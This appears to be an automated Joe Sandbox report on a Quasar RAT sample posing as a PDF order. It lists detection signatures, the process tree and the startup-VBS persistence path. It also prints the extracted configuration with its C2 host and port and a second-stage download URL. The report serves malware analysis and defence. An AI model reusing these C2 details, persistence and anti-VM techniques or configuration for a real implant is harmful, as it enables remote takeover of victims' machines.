Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order88983273293729387293828PDF.exe

Overview

General Information

Sample name:Order88983273293729387293828PDF.exe
Analysis ID:1557393
MD5:abbfb2b5ebf6a24eef7269bde8e80640
SHA1:99be0b33db303c353262f43d7c2e43a03b5e7b65
SHA256:56bd84e77da1de080c2d5c42b6f101574e7146b200026ea9468703d742edec10
Tags:exeuser-lowmal3
Infos:

Detection

Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Quasar RAT
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Order88983273293729387293828PDF.exe (PID: 180 cmdline: "C:\Users\user\Desktop\Order88983273293729387293828PDF.exe" MD5: ABBFB2B5EBF6A24EEF7269BDE8E80640)
    • InstallUtil.exe (PID: 3624 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 5352 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • MaxGeneration.exe (PID: 1344 cmdline: "C:\Users\user\AppData\Roaming\MaxGeneration.exe" MD5: ABBFB2B5EBF6A24EEF7269BDE8E80640)
      • InstallUtil.exe (PID: 3632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware Configuration

Threatname: Quasar

{"Version": "1.4.1", "Host:Port": "new-visit.com:3791;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "3302836a-f2f9-4646-981e-42b54ed610dd", "StartupKey": "Quasar Client Startup", "LogDirectoryName": "Logs", "ServerSignature": "C9zXEwJtOibQvFDLQ+vfJtvabQDqM0ZUSmA76doTBZP+zDTdXB5JsGyJBlY+A6AsJOzt73rW9C/JFeEm7udUTZ+9sM9YLLwjQsGM//s2GgcY3fXWRDLH0a5VGVVld1kBblbqJH+XywIY424ztqa0pieb+zeQFNokpTij1jDci5lqT+r8WHO8hFSYiTmygLG9E4q/HyC3Ynju10HFNsgwBhwKzXdjkGV6E4xn7ogWcn2oS+oRaskuZAEqL5xkC6AYHehE7Gkcvvg7JTS2HpnanFcPWEVPklotxWmnZtvfsIExPewfr7NrRqOeUw5rpMSOidqNjpjxdOSUgEjAwy2Ehysw9i1cEn4QiyQbCGnQ+yW4WcmdB+Pp8JNjirr+ulclNHeAjFGmkfJwX84mS5wXkJrhxqjt3m0uoUChTkgzUu3TdUCMxQickLXVEDHwUMUnAoDEaYPE+or5M8A0hk7VR8Drf3fII9lCdcK4YH9Tiu4JI5GtyEM5ZEhKjIro6WGhDgPEGKWP2kweX5wtwWc6NTRoFoh5xS4ZRf0YX3uaeyQPrbZSE81WIj6u15Kf2hIXebHUAPpE+rCHA7AqbTbQfwVwHWX8h+socDyMQWGoPewEUnZDrvBcXpi/86ZG9qe7KOO2/Ty0ggpbkbFcHzgSAyN0ngCdeunCiF2gWQX8Jyg=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAI4mmpxnrQM91XSmQQCRjzANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MTExNTEwNTgwNVoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAl74Atq0qE4ticBs0gQyGsYcjYy07d7WWBhoHFb+oHZikHljj5TLeQdOH35J+cl7lsaaITuKTR12c5bkyFfcG3i1VTH6vH8yA4ARc+FCzCNIXLCgam9XyFLJ5xzcX/WScF4KPRG66kzHg5YZhk8cdm6sqzXiRscXLSCiDncjhLSYZLinoQK5+Y0Mr+PF7wjQ8fFgvARhaFNafYkjJfN8rCFzX7vJmApBA6W3kSb2VpX5B8JAi0sFZcouKzRkscLB3niGvajmWjlhR1rwbtBec5PQFVoJBjtWj0Q/5amxgAJcpqvDQ2bvW1ANHDy6gHcKwkYHXHWAIrGEqzSTN+56lMa9xHqxgfc44CWrPE5Jl1gH4hVGvqV9zkK4VVbxQsNwb9AldGMgBaJx+wuvAKaou68VA3D+lDDULds/B+NYBcM7sWuGrLZc06GY38EaPyvNqNjH4KlnET+Mpc8GI+a6PUCzwZZXhj8JBc+66IcjEzjAzR6IhmWtZMwygRQS1uuyTdWR/JvrUPHQsRbmlDoUfiPssdXJSo0h5grglD+PZN9rGoLosrgYG8ocMgCaYTZg5veu445Q3p69H2/XVz3gq+xTazrEu5GgBrTBlnifNOUymQ7una7wPRcLUDFNsI+t79eTYeHEEUiekRQqPIl+EFbPVtxstywfZaL/tyuEdxRUCAwEAAaMyMDAwHQYDVR0OBBYEFLUBEl7SUmgdhU3KM8E6flc49/qQMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAIcsPEGxtAETLp1UZvjSDdafHKM/XF0x8kwZFqGqcdx/VcBPgCXJpcRJCZENrYad7cNsz0xze9dGFrJ9hXEc0usIfucHXJRv/w4rNq5IlLNZ5VfHE369cWx5SUwdGKgUnZMooCeSGYosqswEl4cAOAgEpRnEwKYtDi1rfnkB7FcTRaZaqOgGtl+W5u3HKzVwA5TeopcA+ZrRl+/LJg6CRB2KpOL0whXci+yqyI8iQEKJL3WmKDaBHkWh+mWnkunmjCGK/Q9kkf9LZJTIntpNwyawB0f7fMEkzE1v38YA0opLbIeMcnBjWl+t7phU1uETylv64TRDRHC2Ci+sznWXSFsqe5XJAStpjEyPH+Yys8Tijq4MnaLuj7PiiUR0IbvZdbgISayFxB/P9bBpLASWIN3lltwW7P74xjctKciBgWeT49nyukVFCwbYgSdAOS/dAeQkp5N3sZTvAatX14IgwugjQGcPQrVW7hzObB9fVfT4iH85roc4DmVV8Y1k1igFx7A45r03OtNikDskbdEx5KY90IZIzXbkRuVBF5hzpbxPq5Cnth3LeV4+7n1dVlbl9Nyh1qsZUcKiSjeapkXT9gzIONCuVSvop3dc2hj4Sb2zcMIv1u3KG3nxX2WSDyIL3BbqMa2UVkcFeEIOscghTUzF1cRd8LOmdmSd76gUy2jb"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.1890286903.0000000003131000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
    00000005.00000002.1876763959.0000000000720000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
      00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
        00000000.00000002.1722029295.00000000028D8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000003.00000002.1884455692.0000000004C3E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 17 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.MaxGeneration.exe.4c82c50.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.Order88983273293729387293828PDF.exe.6aa0000.12.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                  0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpackMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
                    • 0x28eed8:$x1: Quasar.Common.Messages
                    • 0x29f201:$x1: Quasar.Common.Messages
                    • 0x2ab81e:$x4: Uninstalling... good bye :-(
                    • 0x2ad013:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
                    Click to see the 20 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs" , ProcessId: 5352, ProcessName: wscript.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs" , ProcessId: 5352, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe, ProcessId: 180, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T08:17:06.768317+010020355951Domain Observed Used for C2 Detected72.11.156.803791192.168.2.449731TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T08:17:06.768317+010020276191Domain Observed Used for C2 Detected72.11.156.803791192.168.2.449731TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 5.2.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "new-visit.com:3791;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "3302836a-f2f9-4646-981e-42b54ed610dd", "StartupKey": "Quasar Client Startup", "LogDirectoryName": "Logs", "ServerSignature": "C9zXEwJtOibQvFDLQ+vfJtvabQDqM0ZUSmA76doTBZP+zDTdXB5JsGyJBlY+A6AsJOzt73rW9C/JFeEm7udUTZ+9sM9YLLwjQsGM//s2GgcY3fXWRDLH0a5VGVVld1kBblbqJH+XywIY424ztqa0pieb+zeQFNokpTij1jDci5lqT+r8WHO8hFSYiTmygLG9E4q/HyC3Ynju10HFNsgwBhwKzXdjkGV6E4xn7ogWcn2oS+oRaskuZAEqL5xkC6AYHehE7Gkcvvg7JTS2HpnanFcPWEVPklotxWmnZtvfsIExPewfr7NrRqOeUw5rpMSOidqNjpjxdOSUgEjAwy2Ehysw9i1cEn4QiyQbCGnQ+yW4WcmdB+Pp8JNjirr+ulclNHeAjFGmkfJwX84mS5wXkJrhxqjt3m0uoUChTkgzUu3TdUCMxQickLXVEDHwUMUnAoDEaYPE+or5M8A0hk7VR8Drf3fII9lCdcK4YH9Tiu4JI5GtyEM5ZEhKjIro6WGhDgPEGKWP2kweX5wtwWc6NTRoFoh5xS4ZRf0YX3uaeyQPrbZSE81WIj6u15Kf2hIXebHUAPpE+rCHA7AqbTbQfwVwHWX8h+socDyMQWGoPewEUnZDrvBcXpi/86ZG9qe7KOO2/Ty0ggpbkbFcHzgSAyN0ngCdeunCiF2gWQX8Jyg=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAI4mmpxnrQM91XSmQQCRjzANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MTExNTEwNTgwNVoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAl74Atq0qE4ticBs0gQyGsYcjYy07d7WWBhoHFb+oHZikHljj5TLeQdOH35J+cl7lsaaITuKTR12c5bkyFfcG3i1VTH6vH8yA4ARc+FCzCNIXLCgam9XyFLJ5xzcX/WScF4KPRG66kzHg5YZhk8cdm6sqzXiRscXLSCiDncjhLSYZLinoQK5+Y0Mr+PF7wjQ8fFgvARhaFNafYkjJfN8rCFzX7vJmApBA6W3kSb2VpX5B8JAi0sFZcouKzRkscLB3niGvajmWjlhR1rwbtBec5PQFVoJBjtWj0Q/5amxgAJcpqvDQ2bvW1ANHDy6gHcKwkYHXHWAIrGEqzSTN+56lMa9xHqxgfc44CWrPE5Jl1gH4hVGvqV9zkK4VVbxQsNwb9AldGMgBaJx+wuvAKaou68VA3D+lDDULds/B+NYBcM7sWuGrLZc06GY38EaPyvNqNjH4KlnET+Mpc8GI+a6PUCzwZZXhj8JBc+66IcjEzjAzR6IhmWtZMwygRQS1uuyTdWR/JvrUPHQsRbmlDoUfiPssdXJSo0h5grglD+PZN9rGoLosrgYG8ocMgCaYTZg5veu445Q3p69H2/XVz3gq+xTazrEu5GgBrTBlnifNOUymQ7una7wPRcLUDFNsI+t79eTYeHEEUiekRQqPIl+EFbPVtxstywfZaL/tyuEdxRUCAwEAAaMyMDAwHQYDVR0OBBYEFLUBEl7SUmgdhU3KM8E6flc49/qQMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAIcsPEGxtAETLp1UZvjSDdafHKM/XF0x8kwZFqGqcdx/VcBPgCXJpcRJCZENrYad7cNsz0xze9dGFrJ9hXEc0usIfucHXJRv/w4rNq5IlLNZ5VfHE369cWx5SUwdGKgUnZMooCeSGYosqswEl4cAOAgEpRnEwKYtDi1rfnkB7FcTRaZaqOgGtl+W5u3HKzVwA5TeopcA+ZrRl+/LJg6CRB2KpOL0whXci+yqyI8iQEKJL3WmKDaBHkWh+mWnkunmjCGK/Q9kkf9LZJTIntpNwyawB0f7fMEkzE1v38YA0opLbIeMcnBjWl+t7phU1uETylv64TRDRHC2Ci+sznWXSFsqe5XJAStpjEyPH+Yys8Tijq4MnaLuj7PiiUR0IbvZdbgISayFxB/P9bBpLASWIN3lltwW7P74xjctKciBgWeT49nyukVFCwbYgSdAOS/dAeQkp5N3sZTvAatX14IgwugjQGcPQrVW7hzObB9fVfT4iH85roc4DmVV8Y1k1igFx7A45r03OtNikDskbdEx5KY90IZIzXbkRuVBF5hzpbxPq5Cnth3LeV4+7n1dVlbl9Nyh1qsZUcKiSjeapkXT9gzIONCuVSvop3dc2hj4Sb2zcMIv1u3KG3nxX2WSDyIL3BbqMa2UVkcFeEIOscghTUzF1cRd8LOmdmSd76gUy2jb"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeReversingLabs: Detection: 31%
                    Multi AV Scanner detection for submitted file
                    Source: Order88983273293729387293828PDF.exeReversingLabs: Detection: 31%
                    Source: Order88983273293729387293828PDF.exeVirustotal: Detection: 35%Perma Link
                    Yara detected Quasar RAT
                    Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1890286903.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1876763959.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1722029295.0000000002976000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2919597107.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1861458458.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 180, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3624, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MaxGeneration.exe PID: 1344, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3632, type: MEMORYSTR
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: Order88983273293729387293828PDF.exeJoe Sandbox ML: detected
                    Source: Order88983273293729387293828PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                    Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.4:49734 version: TLS 1.2
                    Source: Order88983273293729387293828PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Order88983273293729387293828PDF.exe, 00000000.00000002.1734653800.0000000004810000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.00000000037E5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Order88983273293729387293828PDF.exe, 00000000.00000002.1734653800.0000000004810000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.00000000037E5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2027619 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (Quasar CnC) : 72.11.156.80:3791 -> 192.168.2.4:49731
                    Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 72.11.156.80:3791 -> 192.168.2.4:49731
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: new-visit.com
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 72.11.156.80:3791
                    Source: global trafficHTTP traffic detected: GET /slim/Wyaiccfynhd.mp3 HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /slim/Wyaiccfynhd.mp3 HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
                    Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
                    Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: ipwho.is
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /slim/Wyaiccfynhd.mp3 HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /slim/Wyaiccfynhd.mp3 HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: www.oleonidas.gr
                    Source: global trafficDNS traffic detected: DNS query: new-visit.com
                    Source: global trafficDNS traffic detected: DNS query: ipwho.is
                    Source: InstallUtil.exe, 00000001.00000002.2917858184.0000000000B59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: InstallUtil.exe, 00000001.00000002.2935903636.0000000005147000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://entityframework-plus.net/
                    Source: InstallUtil.exe, 00000001.00000002.2919597107.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipwho.is
                    Source: InstallUtil.exe, 00000001.00000002.2919597107.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipwho.isd
                    Source: InstallUtil.exe, 00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: InstallUtil.exe, 00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/d
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2919597107.000000000289C000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Order88983273293729387293828PDF.exe, MaxGeneration.exe.0.drString found in binary or memory: http://www.zzzprojects.com
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bulk-operations.net
                    Source: Order88983273293729387293828PDF.exe, MaxGeneration.exe.0.drString found in binary or memory: https://bulk-operations.net/pricing.
